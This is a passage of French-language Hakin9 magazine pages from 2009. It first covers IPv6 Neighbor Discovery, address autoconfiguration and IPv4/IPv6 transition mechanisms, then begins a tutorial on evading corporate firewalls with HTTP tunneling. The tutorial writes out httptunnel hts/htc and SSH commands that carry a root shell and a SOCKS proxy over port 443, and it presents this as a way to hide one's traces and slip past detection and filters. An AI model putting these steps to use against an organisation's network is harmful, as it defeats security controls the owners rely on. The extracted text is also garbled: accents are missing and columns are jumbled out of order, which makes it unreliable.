Ces types de messages sont utiliss en particulier pour obtenir : ladresse des routeurs disponibles, les prfixes rseaux utiliser, le routeur par dfaut, le mcanisme de configuration des adresses : avec Etat (DHCPv6), sans Etat, la valeur des champs gnriques utiliser dans les paquets IPv6 gnrs : Hop Limit, MTU du lien, les valeurs de certains timers spcifiques : dure de vie dun routeur, temps de conservation des adresses des voisins

Ce protocole nest pas rellement scuris (mme si les spcifications initiales laissent supposer une utilisation potentielle conjointe dIPsec) dans sa version usuelle tant donn quil prend place sur un rseau local principalement. Des extensions telles que SEND (SEcure Neighbor Discovery) utilisant des signatures RSA sont possibles afin damliorer la scurit de celui-ci. Ce protocole a cependant linconvnient de ncessiter un sous-rseau diffusion. Les rseaux NBMA (Non Broadcast Multiple Access) tel qu'ATM ou X25 ncessitent lutilisation dun protocole spcifique

Router Solicitation : une machine place sur un lien envoie spontanment ladresse FFO2 ::1 (tous les routeurs sur le lien) une telle requte afin de disposer des informations ncessaires sa configuration. Lorsque lquipement ne dispose pas encore de son adresse, ce type de requte est mis en utilisant ladresse indtermine (::) en tant que source, Router Advertisement : spontanment un routeur positionn sur un lien envoie intervalles rguliers ce type dannonce afin de permettre aux machines prsentes sur le lien de sautoconfigurer. Ce type de message est galement transmis en rponse une requte Router Solicitation. Dans tous les cas ladresse source utilise est ladresse lien-local du routeur. Selon les cas ladresse destination est ladresse de tous les nuds ou ladresse de la machine ayant effectu la requte.

Dans cet optique 2 messages ont t dfinis :

Comme plusieurs routeurs peuvent mettre ce type dannonce, les machines prsentent sur le lien pourront ainsi disposer de plusieurs routeurs en cas de panne. Ceci permet galement de faire du Multihoming si le site concern a tablit des accords avec plusieurs ISP (Internet Service Provider) ou FAI (Fournisseur d'Accs Internet) en franais. Lentte Router Solicitation est trs proche de celle usite pour les messages

Tableau 17. Champs de lentte ICMPv6 Echo Request/Echo Reply Champs Type Code Checksum Identifier Sequence Number Data Taille 8 bits 8 bits 16 bits 16 bits 16 bits Variable Rle Vaut 128 pour Echo Request, 129 pour Echo Reply. Vaut 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Permet didentifier le couple Echo Request/Echo Reply. Permet didentifier le couple Echo Request/Echo Reply. Donnes ventuelles lidentique dans lEcho Request et lEcho Reply.

Tableau 18. Champs de lentte ICMPv6 Router Solicitation Champs Type Code Checksum Reserved Options Taille 8 bits 8 bits 16 bits 32 bits Variable Rle Vaut 133. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Positionn 0. Peut contenir par exemple une sous-option Source Link Layer Address indiquant ladresse MAC de lexpditeur.

22

HAKIN9 2/2009

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 22

2009-01-05, 18:04

TECHNIQUES FONDAMENTALES DIPV6

derreurs ICMPv6 dcrite dans la Figure 11. Le tableau 18 prsente les diffrents champs de lentte Router Solicitation. Le Tableau 19 prsente les diffrents champs de lentte Router Advertisement, lentte quant- lui, est prcis dans la Figure 14. En IPv6, un tel cache existe galement, le cache NDP (Neighbor Discovery Protocol). Il contient des adresses Lienlocal ou globale mais prsentes sur le lien. Deux messages permettent ces diffrentes fonctionnalits : Neighbor Solicitation : une machine voulant effectuer une rsolution dadresse envoie sur le lien ce type de requte en unicast. De la mme manire, une machine sinitialisant vrifie lunicit dune adresse au niveau du lien avant de pouvoir lutiliser en envoyant ce type de requte ladresse multicast sollicite associe, Neighbor Advertisement : une interface recevant un Neighbor Sollicitation doit rpondre avec un Neighbor Advertisement soit pour renseigner son adresse MAC, soit pour invalider ladresse IP quune autre interface tenterait dutiliser. Les Neighbor Advertisements peuvent galement tre mis spontanment pour mettre jour les entres des caches NDP. Le Tableau 21 prsente les diffrents champs de lentte Neighbor Advertisement, lentte quant- lui, est aussi prcis dans la Figure 15.

Dtection dAdresse Duplique (DAD) & Autoconfiguration sans tat

Par simple combinaison des messages du Neighbor Discovery, une interface peut sautoconfigurer automatiquement. Une machine sinitialisant sur un lien, construit dans un premier temps son identifiant dinterface EUI-64 modifi laide de ladresse de sa couche de niveau liaison de donnes. Puis elle construit son adresse Lien-local temporaire par concatnation du prfixe FE80::/64 avec cet identifiant, Elle a ensuite pour charge de vrifier lunicit de cette adresse lien-local ainsi que de son identifiant dinterface. Pour cela elle utilise un algorithme de dtection dadresse duplique (DAD : Duplicate Address Detection). Elle envoie ladresse solicited multicast un paquet Neighbor Solicitation avec pour champ adresse de la cible l'adresse provisoire. Ne disposant pas encore dune adresse valide, elle utilise comme adresse source

Sollicitation et annonces des voisins

Ces types de message sont principalement utiliss pour : obtenir ladresse MAC dune machine partir de son IP ou inversement, vrifier lunicit dune adresse IPv6 avant son utilisation, forcer une mise jour des caches associant adresses MAC et adresses IP (caches NDP).

En IPv4, ces fonctionnalits sont effectues par le protocole ARP (Address Resolution Protocol) ou RARP (Reverse Address Resolution Protocol). Une machine voulant envoyer un paquet une autre (elles peuvent tre toutes deux des routeurs) doit obtenir dans un premier temps son adresse MAC. Elle effectue alors une requte ARP. La rponse associe permet de remplir un cache ARP associant adresses MAC et adresses IP. Chaque entre une dure de vie.

Le Tableau 20 prsente les diffrents champs de lentte Neighbor Solicitation, lentte quant- lui, est prcis dans la Figure 15.

Tableau 19. Champs de lentte ICMPv6 Router Advertisement Champs Type Code Checksum Cur Hop Limit M O Reserved Router Lifetime Reachable Time Retrans Timer Options Taille 8 bits 8 bits 16 bits 8 bits 1 bit 1 bit 6 bits 16 bits 32 bits 32 bits Variable Rle Vaut 134. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Valeur par dfaut que les Machines doivent utiliser pour le champ Hop Limit des paquets gnrs. La valeur 0 indique que ce champ nest pas spcifi par le routeur. Positionn 1 pour indiquer que la configuration dadresse se fait par DHCPv6. Positionn 1 pour indiquer que certains paramtres de configuration supplmentaires sont disponibles via DHCPv6. Ce champ est redondant lorsque le champ M est positionn 1. Positionn 0. Indique la dure de vie (en secondes) de ce routeur en tant que routeur par dfaut. Lorsque ce champ est positionn 0, le routeur ne doit pas tre considr comme le routeur par dfaut. Dure (en millisecondes) pendant laquelle une machine doit considrer quune machine est toujours joignable depuis sa dernire dtection. Temps (en millisecondes) entre 2 retransmissions de messages Neighbor Solicitation. Peut contenir par exemple une sous-option : Source Link Layer Address indiquant ladresse MAC de lexpditeur, MTU indiquant ladresse la taille de MTU usite, Prefix Information indiquant les prfixes rseaux utiliser.
2/2009 HAKIN9 23

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 23

2009-01-05, 18:04

DOSSIER
ladresse indtermine. Si elle ne reoit pas de rponse en retour, cette adresse est considre comme tant unique, et est donc associe linterface. Dans le cas o une rponse, lui parvient, elle ne pourra donc pas utiliser cette adresse, une intervention humaine sera alors indispensable. Il est clair que dans le cas dune panne de lien, au moment de la rparation de ce dernier un conflit dadresse pourra tre dtect. La machine disposant prsent dune adresse Lien-local, il sagit donc pour elle dobtenir une adresse globale routable sur linternet IPv6. Pour cela, elle dispose de deux possibilits : Soit par lintermdiaire dun serveur DHCPv6 (autoconfiguration avec tat), procdure standard en IPv4, Soit par autoconfiguration sans tat ventuellement complte par un serveur DHCPv6. Dans le cas de lautoconfiguration sans tat, linterface cherche acqurir un Router Advertisement (spontanment ou par un Router Solicitation). Ce Routeur Advertisement lui donnera les prfixes rseaux, les routes par dfaut, ventuellement le MTU du lien, les dures de validits de certains timers Elle peut donc ainsi construire laide de son identifiant dinterface, dtermin comme unique, ses diffrentes adresses globales, Dans le cas o le bit O du Router Advertisement est positionn 1, linterface cherchera obtenir des informations complmentaires par DHCPv6 (tel que le DNS par exemple). le processus est achev, elle peut transmettre le paquet linterface en question. Dans le cas contraire, elle met un Neighbor Solicitation pour linterface concerne, Linterface ainsi atteinte rpond par un Neighbor Advertisement afin de renseigner son adresse de niveau liaison de donnes, Lmetteur remplit alors son cache NDP avec le couple (adresse IPv6, adresse MAC) en y ajoutant une dure de validit. Lmetteur peut alors transmettre le paquet en utilisant ladresse MAC correspondante.

Double Pile IPv4/IPv6

Ce mcanisme est le plus usit actuellement. La majeure partie des systmes dexploitation propose maintenant une pile IPv6 en plus de la pile IPv4. Ce mcanisme permet ainsi, selon les besoins, de se connecter lInternet IPv6 ou lInternet IPv4, la condition bien entendu dtre connect au monde IPv6. Auparavant seules les entreprises publiques ou les universits avaient accs ces rseaux. On constate que certains FAI proposent actuellement des accs IPv6. Peu peu on assiste ainsi la cration de bulles IPv6/IPv4 dans les universits et chez les particuliers. Le problme restant tant de faire migrer galement les entreprises pour linstant rticentes, peut-tre par manque de confiance, de comptence, ou tout simplement ne souhaitant pas investir, considrant linutilit de faire voluer leur systme bancal mais qui marche encore ... Les topologies ainsi cres avec les doubles piles nont pas besoin dtre superposes, les plans dadressage peuvent tre totalement disjoints, les quipements hardwares intgrant galement de plus en plus ce mcanisme de double pile, il suffirait dans un premier temps de dfinir un plan dadressage et une topologie IPv6 cohabitant avec lIPv4 et qui voluerait avec les changements hardware et software. Avec laugmentation de la taille des adresses, bien videmment les interfaces de communication rseaux ont t galement adaptes. Des points daccs par sockets aux services de la couche transport ont t spcialement dfinis pour IPv6. Dans un contexte de double pile on pourrait donc imaginer quil faille un client/serveur spcifique IPv6 et de mme un client/serveur spcifique IPv4 (i.e. un serveur telnet utilisant les sockets IPv4 et un serveur utilisant les sockets IPv6). Ce contexte de double-pile offre cependant une particularit intressante avec la dfinition dun type dadresse particulier : les adresses IPv4 Mappes. Ces adresses ont le format IPv6 mais incluent ladresse IPv4. Seules les sockets IPv6 sont ainsi ncessaires, selon ladressage utilis le paquet est redirig ou non vers la pile IPv4.

Ces tapes sont graphiquement prsentes dans la Figure 17.

Mcanismes de transition & Introprabilit IPv4/IPv6 ?

Le diagramme dtats de la Figure 16 rsume ces diffrentes tapes.

Rsolution dadresse
La rsolution dadresse en IPv6 est comme prcise auparavant identique celle dIPv4. Une machine dsireuse denvoyer un paquet une autre (routeur ou non) doit auparavant rsoudre son adresse de niveau liaison de donne. Elle effectue ainsi les tapes suivantes : Vrification de la prsence de ladresse IP dans le cache NDP. Si celle-ci est dj prsente et quelle na pas expire,
HAKIN9 2/2009

L'ensemble des protocoles de niveau rseau ayant t modifi avec IPv6, vient naturellement la question de l'introprabilit avec IPv4; d'autant plus que mme les protocoles de niveau transport (UDP, TCP) et applicatif (DNS, FTP ) se sont adapts pour cette prise en compte de l'augmentation de l'espace d'adressage. Par dfaut les mondes sont ainsi totalement distincts, l'Internet IPv6 tant disjoint de l'Internet IPv4. Cette sparation ayant t value comme l'un des principaux freins au dploiement d'IPv6, l'IETF a originellement mis l'accent sur un certain nombre de mcanismes de transition pour assurer des passerelles entre ces deux mondes. Nanmoins devant le surnombre de propositions, le Working Group de l'IETF ngstrans charg de la standardisation des mcanismes de transition a finalement considr qu'il fallait conserver uniquement quelques mcanismes et promouvoir plutt une migration progressive mais totale des sites en IPv6. Le risque valu tant que les diffrents sites restent en IPv4 et utilisent l'un ou l'autre des mcanismes de transition pour accder aux backbones IPv6. Dans ce paragraphe nous prsenterons succinctement certains des mcanismes de transition les plus usits.

24

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 24

2009-01-05, 18:04

TECHNIQUES FONDAMENTALES DIPV6

Passerelle Applicative (ALG : Application Level Gateway)
Le principe des ALGs est assez similaire pour lensemble des passerelles applicatives : un proxy quip dune double pile permet la cohabitation entre les 2 mondes. Si lon prend lexemple dHTTP (prsent en Figure 18), on peut considrer une machine M sur un site entirement quip en IPv6 ralisant une requte en IPv6 pour une URL en IPv4. Le proxy HTTP est lui connect en IPv6 sur le site et en IPv4 sur lInternet. Il ralise alors la requte en IPv4 pour lURL IPv4, rcupre la page et la transmet en IPv6 M. La symtrie est identique, dans le cas o le site est entirement en IPv4 et la requte pour une URL IPv6. Ce type de mcanisme permet ainsi de faire cohabiter les 2 mondes et fonctionne ds lors que le protocole concern de niveau applicatif permet lutilisation dun proxy quip dune double pile ou ncessite la connexion distante sur un serveur quip dune double pile. Cest par exemple le cas des relais DNS, des serveurs POP3, IMAP4, SMTP

Traduction dentte : SIIT/NAT-PT

Les mcanismes de traduction dentte permettent tout simplement comme leur nom lindique la traduction dun entte IPv4 vers un entte IPv6 ou inversement (avec ventuellement les enttes de niveau transport). Le mcanisme le plus complet est SIIT/NAT-PT (Stateless IP, ICMP Translation Algorithm/Network Address Translation Protocol Translation). Mme si en thorie SIIT peut fonctionner seul, son utilisation sans tat et la clart de sa spcification en font un protocole difficilement utilisable seul. Conjointement avec NAT-PT (ou lextension NAPT-PT : Network Address Port Translation-Protocol Translation), ce protocole permet donc de faire cohabiter les 2 mondes. Il fonctionne la manire du NAT, garde des informations dtats, alloue des adresses IPv4 au besoin depuis un pool, fait ventuellement de la translation de port et connat les mmes difficults lies cette allocation dynamique. Si lon prend pour exemple la Figure 19, une machine M dans un rseau IPv6 dsireuse de contacter une machine N dans un rseau IPv4, celle-ci transmet un

paquet IPv6 vers un botier NAT-PT avec pour destination une adresse spciale IPv6 compose dun prfixe NAT-PT suivi de ladresse IPv4 transforme en hexadcimal. Ce botier a alors la charge de traduire lentte en IPv4, dallouer une adresse IPv4 pour lmetteur, de remplir une table dassociation entre adresse IPv4 alloue et adresse IPv6 de lexpditeur, de rcuprer ladresse IPv4 du destinataire, pour finalement transmettre ce nouveau paquet sur le rseau IPv4 vers la destination. La rponse potentielle suivra le chemin inverse. La table dassociation permettra de retrouver le destinataire effectif de cette rponse. On comprend donc quil est trs difficile de maintenir des serveurs sur le rseau IPv6. Cette table dassociation doit en effet tre statique pour les serveurs potentiels. De plus les informations lies aux adresses et contenues dans les charges utiles devront tre galement modifies par ce type de traducteur. Dautres protocoles doivent par consquent se greffer en plus pour le FTP, le DNS Ce type de protocole a galement du mal conserver la smantique des paquets

Tableau 20. Champs de lentte ICMPv6 Neighbor Solicitation Champs Type Code Checksum Reserved Target Address Options Taille 8 bits 8 bits 16 bits 32 bits Variable Variable Rle Vaut 135. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Positionn 0. Adresse de la cible sollicite. Ne doit pas tre une adresse Multicast. Peut contenir par exemple une sous-option Source Link Layer Address indiquant ladresse MAC de lexpditeur.

Tableau 21. Champs de lentte ICMPv6 Neighbor Advertisement Champs Type Code Checksum R S O Reserved Target Address Options Taille 8 bits 8 bits 16 bits 1 bit 1 bit 1 bit 29 bits 32 bits Variable Rle Vaut 136. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Positionn 1 pour indiquer que lexpditeur est un routeur. Positionn 1 pour indiquer que la rponse lest suite une requte dun message Neighbor Solicitation. Positionn 1 pour indiquer que cette rponse doit mettre jour lentre du cache NDP. Positionn 0. En rponse des Neighbor Solicitation, contient ladresse de lentit ayant effectue cette requte, sinon contient ladresse dont lidentifiant dinterface a chang. Peut contenir par exemple une sous-option Target Link Layer Address indiquant ladresse MAC de lexpditeur de ce message.
2/2009 HAKIN9 25

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 25

2009-01-05, 18:04

DOSSIER
lors de la traduction, se marie trs mal avec les mcanismes de scurit IPsec, la mobilit de machines (MIPv6), la mobilit de rseaux (NEMO), le multicast Devant les nombreux problmes rencontrs, lIETF a donc dcid de ne pas encourager la mise en uvre de ce protocole et la dprci.

Rfrences

Voici quelques rfrences glanes sur Internet : http://standards.ieee.org/regauth/oui/tutorials/EUI64.html Guidelines For 64-Bit Identifier (EUI-64) Registration Authority, http://standards.ieee.org/regauth/oui/oui.txt OUI dfinis par lIEEE, http://www.iana.org/assignments/ipv6-multicast-addresses IPv6 Multicast Adresses, http://www.iana.org/assignments/protocol-numbers/ Protocol Numbers, http://livre.point6.net/index.php IPv6 Thorie et Pratique Gisle Cizault.

Tunneling
Ce type de mcanisme repose principalement sur des besoins de communication de sites ou dlots isols IPv6 (respectivement IPv4) sur une infrastructure IPv4 (respectivement IPv6). Le nombre de mcanismes imagins dans ce contexte foisonne, aucun ntant rellement satisfaisant. 2 techniques diffrentes sopposent ici : les tunnels configurs manuellement ou par un fournisseur public (Tunnel Broker), les tunnels automatiques : 6to4, Teredo, Isatap machine N dun autre rseau 6to4, transmettra donc les paquets IPv6 sa passerelle par routage. Le champ destination indiquera une adresse forme dun prfixe 6to4 incluant ladresse IPv4 de la passerelle de destination. Ce paquet sera ainsi automatiquement encapsul dans un paquet IPv4 avec comme adresse source ladresse de la passerelle mettrice et comme adresse destination celle de rception. La passerelle rceptrice dsencapsulera ce paquet avant de le transmettre sur son lot. Chaque passerelle pointe galement vers un relais par dfaut connect lInternet IPv6. Ce mcanisme simple mettre en uvre a de nombreuses failles de scurit : en particulier il est sensible au dni de service et noffre pas de contrle sur le trafic reu. Une passerelle 6to4 a en effet la possibilit de vrifier la cohrence dadressage entre lentte IPv6 encapsule et lentte IPv4 dans le cas o lmetteur est une passerelle 6to4 mais cette vrification est presque impossible si la source est une adresse native. Dans ce cas-l le paquet sera transmis sur le rseau IPv6 protg par la passerelle, sans certitude quil ne sagit pas dun paquet forg. Le risque est dautant plus important que ladresse IPv4 de lmetteur sera probablement perdue aprs le transfert. IPv4.Il supporte un rseau NBMA (Non Broadcast Multicast Access), gnre des adresses Lien-local depuis les adresses IPv4 et permet lutilisation du protocole Neighbor Discovery au-dessus de cette infrastructure IPv4.

Conclusion

De nombreux mcanismes de transition ont t dfinis pour permettre : la cohabitation des 2 mondes, la communication entre les 2 mondes, la communication entre lots isols IPv6 (respectivement IPv4) dans une infrastructure IPv4 (respectivement IPv6), la communication entre un lot isol IPv6 (respectivement IPv4) et lInternet IPv6 (respectivement IPv4).

Lide nest pas ici de les prsenter tous en dtail, on pourra se reporter aux spcifications au besoin.

Tunnel brokers
Plusieurs fournisseurs proposent ainsi des interfaces WEB permettant aprs inscription la configuration dun tunnel IPv6 sur IPv4 vers le site de lintress. Il suffit donc de configurer manuellement ou par des scripts fournis lautre partie du tunnel jusquau routeur du fournisseur pour accder lInternet IPv6. Cest finalement la mthode la plus approprie pour joindre lInternet IPv6 pour un particulier dont le FAI ne propose pas dIPv6.

6to4
Ce type de mcanisme est principalement usit pour permettre la communication entre lots IPv6 sur une infrastructure IPv4 tout en permettant un accs lInternet IPv6. Le principe est relativement simple : chaque lot isol, qualifi de rseau 6to4 dispose en bordure dune passerelle 6to4 quipe dune double pile. Chaque lot utilise un prfixe particulier qualifi de prfixe 6to4 form de la manire suivante : 2002:: Adresse IPv4 du Relais ::/48 Dans la Figure 20, une machine M dsireuse de communiquer avec une
26 HAKIN9 2/2009

Quelques autres protocoles

Teredo (Tunneling IPv6 over UDP through NAT ) est assez similaire 6to4. Il dfinit une mthode permettant d'accder l'Internet IPv6 derrire un quipement ralisant du NAT en encapsulant les paquets IPv6 dans de l'UDP sur IPv4 entre le client et le relais Teredo l'aide d'un serveur Teredo. ISATAP (Intra-Site Automatic Tunnel Addressing Protocol) permet la connectivit IPv6 au dessus dune infrastructure

Aucun de ces mcanismes nest pleinement satisfaisant, mais ils nont pas pour vocation d'exister durablement. Ils devraient dcrotre dans le temps en fonction du nombre d'quipements IPv6 prsents sur le rseau. Afin danticiper le passage IPv6, les applications rseaux futures devraient dj prendre en compte ce nouveau mode dadressage et en particulier utiliser les sockets IPv6 qui dans tous les cas permettent la communication avec les 2 mondes. Les anciennes applications doivent galement tre adaptes dans cet esprit. Bien entendu, il sera difficile de faire migrer celles dont on ne dispose plus des sources. Vous trouverez dans le Tableau 23 les rfrences aux normes dcrites au sein de cet article. propos de l'auteur
Frdric Roudaut travaille actuellement chez Orange Labs (anciennement France Telecom R&D) Sophia Antipolis pour le compte dOrange Business Services IT&Labs depuis 1 an et demi. Pour contacter l'auteur : frederic.roudaut@free.fr

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 26

2009-01-05, 18:04

TECHNIQUES FONDAMENTALES DIPV6

2/2009 HAKIN9

27

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 27

2009-01-05, 18:05

MICHAEL SCHRATT

PRATIQUE Tunneling HTTP

Une mthode simple pour contourner les firewalls

La plupart des entreprises ont des normes de scurit strictes. Tandis que les administrateurs font de leur mieux pour scuriser les attaques potentielles sur le rseau, il existe des utilisateurs qui tentent de compromettre le primtre de scurit. Internet et Google recensent des articles expliquant comment compromettre des firewalls ou des antivirus.

Degr de difficult

CET ARTICLE EXPLIQUE...

Comment tablir un tunneling HTTP. Quels outils sont votre disposition pour y parvenir. Quel est le rle du tunneling, Quelles techniques peuvent tre employes dans le domaine des canaux cachs.

CE QU'IL FAUT SAVOIR...

Vous devez savoir utiliser les systmes d'exploitation Linux & Windows. Les bases du tunneling. Avoir des connaissances dans les rseaux de type TCP/IP, en particulier les couches 4 et 5. Savoir utiliser un outil d'analyse rseau, par exemple Wireshark, tcpdump. 28 HAKIN9 2/2009

ans une entreprise, naviguer sur Internet est autoris pour tous les employs. Mais dans ce cas, quentend-t-on par naviguer ? Pour accder au web il faut deux ports ouverts qui autorisent les connexions sortantes. Le port 80 est associ au HTTP et le port 443 est associ au HTTPS (Cf. Tableau 1. portant sur les numros de port importants). Il est plus simple de mener une politique de scurit de l'intrieur vers l'extrieur que l'inverse. Les techniques par canaux cachs sont rpandues et plutt simples prendre en main si on se fie aux nombreux tutoriels sur Internet. Il est clair qu'on ne pourra jamais atteindre une scurit 100%, mais avec certaines mesures on peut s'en rapprocher. Avec les Canaux Cachs, si le trafic est autoris, le protocole employ peut servir de support l'envoie d'informations. Il devient difficile de le dtecter. Dans cet article, je vais vous dmontrer qu'on peut cacher ses traces avec le Tunneling HTTP. Je vous montrerai galement deux outils faciles prendre en main et certaines mesures que vous pourrez mettre en uvre pour prvenir le tunneling. Revenons-en notre exemple, le trafic parat normal. C'est un trafic HTTP/HTTPS. En cas de dtection d'une quelconque anomalie, il se pourrait qu'il y ait des alertes spcifiques. Par exemple, en cas de trafic httptunnel. Que peut-on faire exactement ?

Ce que permet lutilisation des canaux cachs

Naviguer sur des sites non autoriss ; Tchater via ICQ ou IRC ; Accder certains serveurs sur Internet et contrler des postes distants ; Tlcharger des fichiers avec des extensions filtres ; Tlcharger des fichiers comportant du code malveillant ;

Qui utilise cette technique ?

Les hackers ; Les employs mcontents ; Les utilisateurs dans le rseau interne de l'entreprise.

Outils faciles prendre en main

Parmi les outils faciles, il est important de parler de GNU httptunnel disponible sous Windows et SSH disponible sous Windows et Linux.

GNU httptunnel

Informations issues du site http://www.nocrew.org/ software/httptunnel.html

IANA

Consultez le site http://www.iana.org/ pour de plus amples informations.

28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 28

2009-01-05, 18:05

CONTOURNER LES FIREWALLS

httptunnel permet de crer une connexion virtuelle bidirectionnelle tunnele sous forme de requtes HTTP pour l'envoi des donnes. Si vous le souhaitez, vous pouvez envoyer des requtes via un proxy HTTP. C'est intressant pour les utilisateurs qui se retrouvent derrire un firewall, en rgle gnrale restrictive. Si vous avez l'autorisation dutiliser un proxy HTTP pour accder Internet, alors vous pouvez utiliser httptunnel et avec telnet ou une connexion PPP tablir une connexion sortante mme s`il y a un firewall.. httptunnel est conu et mis jour par Lars Brinkhoff. Httptunnel est disponible sous Windows en tant que fichier binaire.

SSH pour Windows et Linux

Dans le pass on pouvait accder un shell par l'utilisation de telnet. Telnet est aujourd'hui viter pour le transfert de texte. Il est trop inscuris. Il est possible de sniffer le trafic telnet sur un rseau afin d'obtenir conscutivement les noms

Figure 1. Primtre de Scurit du Rseau d'utilisateurs et les mots de passe de diverses personnes. Les versions de Linux sorties aprs Janvier 2002 avaient OpenSSH prinstalles. SSH a remplac telnet et a apport des amliorations au niveau du cryptage du trafic. SSH se nomme galement : Secure Shell. Outre le cryptage du trafic, le SSH permet de scuriser le transfert de vos fichiers et facilite la phase dauthentification. Vous pouvez installer OpenSSH sur un poste Windows tant Tableau 1. Numros de Ports Essentiels Numro de Port 20 21 / TCP 22 / TCP 23 / TCP 25 / TCP 53 / TCP UDP 80 / TCP 110 / TCP 143 / TCP UDP 161 162 / TCP UDP 443 / TCP 1080 / TCP 3128 / TCP 5190 / TCP 6660 6669 / TCP Service FTP SSH Telnet SMTP DNS HTTP POP3 IMAP SNMP HTTPS SOCKS Proxy Squid Proxy ICQ AOL Messenger IRC
2/2009 HAKIN9 29

donn quil existe au format binaire. Il existe un autre client SSH trs connu sous Windows et Unix : Putty. Putty est un outil graphique gratuit comprenant telnet et SSH.

Techniques de canaux cachs

Problme de transfert

Le piratage par canaux cachs est une attaque d'origine interne permettant dtablir des connexions entre des rseaux de confiance vers d'autres non vrifis. Voici diffrents types de techniques : Techniques de Canaux Direct Tunneling ACK Tunneling TCP (telnet, ssh) Tunneling UDP (snmp) Tunneling ICMP

Comme mentionn ci-dessus, en rgle gnrale les ports les plus utiliss pour tablir des connexions sortantes sont : le port 80 (Trafic HTTP non crypt) et le port 443 (Transfert crypt ou HTTPS).

Techniques de Canaux Proxy Tunneling SSL Tunneling HTTPS Tunneling DNS Tunneling FTP Tunneling Mail

L'utilisation des canaux cachs pour le transfert de donnes au sein de votre rseau d'entreprise doit se faire dans un cadre lgal (Cf. Lgalit & Ramifications, pour de plus amples informations).

Avertissement

28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 29

2009-01-05, 18:06

PRATIQUE
connecter avec ce tunnel au shell. In fine, on obtient un trafic SSL bas sur un tunnel HTTP avec cryptage, authentification et intgrit des donnes.

Environnement interne & externe ncesairre

Voici le pr-requis techniques avant de se lancer au travail. Pour ct entreprise : Un poste de travail avec accs Internet et au moins un service autoris se connecter l'extrieur, httptunnel au niveau client client SSH.

Figure 2. Client SSH Putty

Ct utilisateur : Poste de travail avec accs Internet, serveur httptunnel correctement configur, Serveur daemon SSH correctement configur (Configuration dcrite sous : Configuration des Services), Avoir pralablement lanc le service auquel vous souhaitez accder distance.

Figure 3. Client SSH Linux Imaginez que l'on veuille accder au port 22 pour faire du SSH sur notre serveur Internet. Avec les restrictions du firewall, on ne peut se connecter directement au port 22 pour ouvrir un shell (invite de commandes).

Vous allez voir comment configurer le serveur httptunnel. La configuration d'un tunnel est relativement simple. Httptunnel est un utilitaire en ligne de commande avec plusieurs fonctions. Selon la configuration dcrite dans la partie Environnement Interne & Externe Ncessaire il y a la possibilit de lancer et configurer directement httptunnel.

Configurer les services

On peut pourtant contourner ce problme avec httptunnel

Reportez-vous la figure 5. Vous verrez notamment comment le tunneling permet de passer au travers des firewall et des proxies. Vous verrez galement, comment contourner les filtres de protection et les systmes de dtection bass sur les signatures avec un cryptage SSH. Le but : tablir un tunnel HTTP et se
30 HAKIN9 2/2009

Figure 4. Problme de transfert

28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 30

2009-01-05, 18:06

CONTOURNER LES FIREWALLS

putty -P 10001 root@localhost ou, or utilisez -l pour le paramtre login_name. ssh -p 10001 root@localhost

Figure 5. Problme de Transfert Rsolu

Voici les commandes :

hts forward-port localhost:22 hts -F localhost:22 443

443 (port du tunnel : 443 22), ou bien

Avec une commande netstat on peut vrifier que la connexion http tunnel est bien tablie. Le port 10001 doit tre en ECOUTE. Lancez ensuite votre client SSH et connectez-vous au port 10001 en local

(Cf. Figure 3. Pour voir les paramtres SSH). Si ncessaire, entrez vos informations de connexion. Jusqu' prsent, vous avez ouvert une connexion Tunnele HTTP par laquelle vous vous connectez pour utiliser le shell ct serveur. De cette faon, vous utilisez uniquement ce shell pour excuter des commandes sur le serveur. Pour le transfert des donnes par le tunnel vous prfrerez sans doute SCP. Bon, avanons, nous allons maintenant installer un proxy en local et l'utiliser pour d'autres applications telles que : IRC et Skype. Toute application pouvant utiliser un Proxy SOCK est la bienvenue. Vous pouvez utiliser le serveur de messagerie avec votre mail personnel pour envoyer des messages ou accder au Serveur

Si vous n'avez pas les droits administrateur vous pouvez utiliser les ports au-dessus de 1024, par exemple :
hts forward-port localhost:22 hts help 40000

Si notre serveur httptunnel est lanc et en cours d'excution, vous devriez obtenir la mme chose qu' la Figure 7. Le port 443 doit tre en ECOUTE.

Configurer le service SSH

Pour avoir une compatibilit complte avec votre tunnel, effectuez les changements lists au Listing 1. Configuration SSH.

Dernire tape : ouvrir un tunnel et connectez-vous au serveur SSH

Figure 6. Ecran d'aide d'HTS

On a presque fini. Terminons en lanant le tunnel. Il faut tre habitu utiliser le client httptunnel. La meilleure faon de procder est encore en ligne de commande :
htc --forward-port 10001 192.168.11.240:443

Nous allons maintenant lier le port local 10001 au serveur httptunnel ayant pour adresse ip : 192.168.11.240 sur le port 443.

Figure 7. Vrification HTS

2/2009 HAKIN9 31

28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 31

2009-01-05, 18:16

PRATIQUE
POP/IMAP avec le tunnel. Tout dpend du port utilis avec le client SSH.

Continuons sur notre lance

Pour crer votre propre Proxy SOCK, vous pouvez taper :

htc forward-port 10001 putty -D 1080 -P 10001

Figure 8. HTC & Port Proxy

192.168.11.240:443 (ouvre un tunnel),

root@localhost (connectez-vous au shell grce au tunnel de votre port local et slectionnez 1080 en tant que port dynamique de redirection), configurez galement votre navigateur comme la Figure 10.

Figure 9. Paramtres Proxy sous Firefox

Figure 10. IP sans Proxy et Tunnel

